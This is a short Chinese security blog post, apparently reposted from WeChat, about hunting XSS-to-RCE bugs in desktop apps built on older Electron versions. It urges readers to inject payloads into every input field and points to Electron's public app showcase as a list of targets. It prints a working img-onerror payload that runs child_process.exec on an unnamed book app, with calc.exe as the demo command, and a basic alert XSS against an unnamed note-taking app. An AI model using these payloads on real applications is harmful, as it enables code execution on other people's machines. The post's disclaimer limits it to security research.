前言
CFW跑路事件闹得沸沸扬扬,在群里看到有搞安全的小伙伴吐槽了下CFW经常出洞,于是想到了去年那个CFW RCE,那个洞和之前蚁剑RCE一样的,都是基于electron组件的XSS2RCE,原理其实没啥好说的。总结一下就是如果你遇到了gui好看的windows应用,那么只要其功能有框你就插,有参数你就改即可。
所以,理论上来讲,只要用了electron(旧版本)组件开发的应用都会存在这个漏洞呢?带着这个疑问,我找到了electron官网的客户案例:
http:
//www.electronjs.org/apps
全测是不可能全测的,也没必要全测,也可以通过搜索引擎找到使用了electron组件的国产应用来测。
漏洞1-某图书软件
<img/src=
"1"
/onerror=
eval
(`require(
"child_process"
).
exec
(
"calc.exe"
);`);>
导入以后,直接点击即可触发:
漏洞2-某云笔记
xss的payload:
<
img
src
=
x
onerror
=
"javascript:alert(/xss/)"
>
没想到的是移动端也能弹(指定是非electron问题了):
xss2rce没成功,应该是有沙箱,逆向师傅也没分析出个所以然,所以,到此为止。
原文始发于微信公众号(山海之关):有手就能捡到的0day漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论